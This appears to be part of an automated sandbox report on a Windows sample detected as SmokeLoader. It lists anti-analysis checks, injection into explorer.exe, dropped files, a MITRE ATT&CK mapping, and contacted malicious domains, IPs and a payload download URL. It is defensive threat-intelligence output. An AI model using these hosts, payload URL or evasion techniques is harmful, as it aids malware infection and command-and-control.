Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\trbwcit	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\trbwcit	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\trbwcit	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\trbwcit	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\trbwcit	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\trbwcit	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\565.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\565.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\565.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\565.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\565.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\565.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fgbwcit	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fgbwcit	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fgbwcit	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fgbwcit	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fgbwcit	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fgbwcit	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\file.exe	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\Desktop\file.exe	API/Special instruction interceptor: Address: 7FFE2220D584
Source: C:\Users\user\AppData\Roaming\trbwcit	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\AppData\Roaming\trbwcit	API/Special instruction interceptor: Address: 7FFE2220D584
Source: C:\Users\user\AppData\Local\Temp\565.exe	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\AppData\Local\Temp\565.exe	API/Special instruction interceptor: Address: 7FFE2220D584
Source: C:\Users\user\AppData\Roaming\fgbwcit	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\AppData\Roaming\fgbwcit	API/Special instruction interceptor: Address: 7FFE2220D584

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: file.exe, 00000000.00000002.1818652530.0000000002DAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOKK
Source: trbwcit, 00000005.00000002.2089569159.0000000002D4E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK4

Source: C:\Users\user\AppData\Local\Temp\565.exe

Code function: 6_2_00401E65 rdtsc

6_2_00401E65

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 432	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3142	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 652	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 869	Jump to behavior

Source: C:\Windows\explorer.exe TID: 7540	Thread sleep count: 432 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7548	Thread sleep count: 3142 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7548	Thread sleep time: -314200s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7544	Thread sleep count: 652 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7544	Thread sleep time: -65200s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7888	Thread sleep count: 268 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7896	Thread sleep count: 272 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7892	Thread sleep count: 270 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8068	Thread sleep count: 91 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8072	Thread sleep count: 128 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8076	Thread sleep count: 132 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7548	Thread sleep count: 62 > 30	Jump to behavior

Source: explorer.exe, 00000001.00000000.1809487510.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1808911051.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000001.00000000.1806362618.00000000078A0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000001.00000000.1809487510.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1804862887.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000001.00000000.1809487510.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000001.00000000.1806362618.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000001.00000000.1808911051.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000001.00000000.1808911051.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1808911051.000000000982D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000001.00000000.1809487510.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000001.00000000.1806362618.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000001.00000000.1804862887.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000001.00000000.1808911051.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000001.00000000.1804862887.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\file.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\trbwcit	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\565.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fgbwcit	System information queried: CodeIntegrityInformation	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\trbwcit	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\565.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fgbwcit	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\565.exe

Code function: 6_2_00401E65 rdtsc

6_2_00401E65

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02D80D90 mov eax, dword ptr fs:[00000030h]	0_2_02D80D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02D8092B mov eax, dword ptr fs:[00000030h]	0_2_02D8092B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02DBA70B push dword ptr fs:[00000030h]	0_2_02DBA70B
Source: C:\Users\user\AppData\Roaming\trbwcit	Code function: 5_2_02CC0D90 mov eax, dword ptr fs:[00000030h]	5_2_02CC0D90
Source: C:\Users\user\AppData\Roaming\trbwcit	Code function: 5_2_02CC092B mov eax, dword ptr fs:[00000030h]	5_2_02CC092B
Source: C:\Users\user\AppData\Roaming\trbwcit	Code function: 5_2_02D59DF3 push dword ptr fs:[00000030h]	5_2_02D59DF3
Source: C:\Users\user\AppData\Local\Temp\565.exe	Code function: 6_2_02BF0D90 mov eax, dword ptr fs:[00000030h]	6_2_02BF0D90
Source: C:\Users\user\AppData\Local\Temp\565.exe	Code function: 6_2_02BF092B mov eax, dword ptr fs:[00000030h]	6_2_02BF092B
Source: C:\Users\user\AppData\Local\Temp\565.exe	Code function: 6_2_02C6A049 push dword ptr fs:[00000030h]	6_2_02C6A049
Source: C:\Users\user\AppData\Roaming\fgbwcit	Code function: 8_2_02C39E19 push dword ptr fs:[00000030h]	8_2_02C39E19
Source: C:\Users\user\AppData\Roaming\fgbwcit	Code function: 8_2_02E80D90 mov eax, dword ptr fs:[00000030h]	8_2_02E80D90
Source: C:\Users\user\AppData\Roaming\fgbwcit	Code function: 8_2_02E8092B mov eax, dword ptr fs:[00000030h]	8_2_02E8092B

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: fgbwcit.1.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 175.119.10.231 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 190.147.128.172 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.145.40.164 443	Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\file.exe	Thread created: C:\Windows\explorer.exe EIP: 8C419A8	Jump to behavior
Source: C:\Users\user\AppData\Roaming\trbwcit	Thread created: unknown EIP: 9A619A8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\565.exe	Thread created: unknown EIP: 9B41970	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fgbwcit	Thread created: unknown EIP: 9091970	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\file.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\trbwcit	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\trbwcit	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\565.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\565.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fgbwcit	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fgbwcit	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Source: explorer.exe, 00000001.00000000.1805096905.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1808911051.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1806215817.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.1805096905.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.1804862887.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000001.00000000.1805096905.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000001.00000000.1805096905.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\AppData\Roaming\trbwcit

Code function: 9_2_00404E64 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

9_2_00404E64

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00415B60 InterlockedCompareExchange,ReadConsoleA,FindAtomW,SetConsoleMode,SearchPathW,SetDefaultCommConfigW,MoveFileW,GetVersionExW,DisconnectNamedPipe,ReadConsoleOutputW,GetModuleFileNameA,LCMapStringA,PulseEvent,SetCommState,GetConsoleAliasesLengthA,GetStringTypeExW,BuildCommDCBA,GetTimeFormatW,GetFileAttributesA,GetConsoleAliasExesLengthA,GetBinaryType,LoadLibraryA,InterlockedDecrement,

0_2_00415B60

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 00000005.00000002.2089545393.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2686854364.0000000002E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2387169374.0000000002C21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1818628832.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1818859603.0000000002EF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2687018881.0000000003001000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2387127676.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2089499262.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 00000005.00000002.2089545393.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2686854364.0000000002E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2387169374.0000000002C21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1818628832.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1818859603.0000000002EF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2687018881.0000000003001000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2387127676.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2089499262.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	32 Process Injection	11 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	12 Virtualization/Sandbox Evasion	LSASS Memory	521 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	32 Process Injection	Security Account Manager	12 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Hidden Files and Directories	NTDS	3 Process Discovery	Distributed Component Object Model	Input Capture	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	14 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Link
file.exe	37%	ReversingLabs
file.exe	40%	Virustotal	Browse
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Roaming\fgbwcit	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\trbwcit	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\565.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\trbwcit	37%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
nwgrus.ru	12%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://powerpoint.office.comcember	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	0%	URL Reputation	safe
https://word.office.com	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://api.msn.com/	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	0%	URL Reputation	safe
https://23.145.40.164/ksa9104.exe	0%	Virustotal		Browse
https://aka.ms/odirmr	0%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	0%	Virustotal		Browse
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	0%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	0%	Virustotal		Browse
https://api.msn.com/q	0%	Virustotal		Browse
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg	0%	Virustotal		Browse
https://ninjahallnews.com/search.php	0%	Virustotal		Browse
http://www.autoitscript.com/autoit3/J	0%	Virustotal		Browse
https://wns.windows.com/L	0%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	0%	Virustotal		Browse
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg	0%	Virustotal		Browse
https://api.msn.com/v1/news/Feed/Windows?&	0%	Virustotal		Browse
https://fallhandbat.com/search.php	0%	Virustotal		Browse
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	0%	Virustotal		Browse
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	0%	Virustotal		Browse
https://aka.ms/Vh5j3k	0%	Virustotal		Browse
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	0%	Virustotal		Browse
https://www.msn.com:443/en-us/feed	0%	Virustotal		Browse
https://www.rd.com/list/polite-habits-campers-dislike/	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
nwgrus.ru	190.147.128.172	true	true	12%, Virustotal, Browse	unknown
fallhandbat.com	unknown	unknown	true		unknown
ninjahallnews.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://23.145.40.164/ksa9104.exe	true	0%, Virustotal, Browse	unknown
https://ninjahallnews.com/search.php	true	0%, Virustotal, Browse	unknown
https://fallhandbat.com/search.php	true	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://aka.ms/odirmr	explorer.exe, 00000001.00000000.1806362618.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	explorer.exe, 00000001.00000000.1806362618.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://powerpoint.office.comcember	explorer.exe, 00000001.00000000.1811007850.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000001.00000000.1808911051.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-	explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://excel.office.com	explorer.exe, 00000001.00000000.1811007850.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.micro	explorer.exe, 00000001.00000000.1809694826.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1808417932.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1807989575.0000000007F40000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we	explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	explorer.exe, 00000001.00000000.1806362618.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi	explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/q	explorer.exe, 00000001.00000000.1808911051.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc	explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000001.00000000.1811007850.000000000C893000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1	explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg	explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark	explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A	explorer.exe, 00000001.00000000.1806362618.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	explorer.exe, 00000001.00000000.1806362618.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000001.00000000.1811007850.000000000C964000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://wns.windows.com/L	explorer.exe, 00000001.00000000.1811007850.000000000C557000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://word.office.com	explorer.exe, 00000001.00000000.1811007850.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
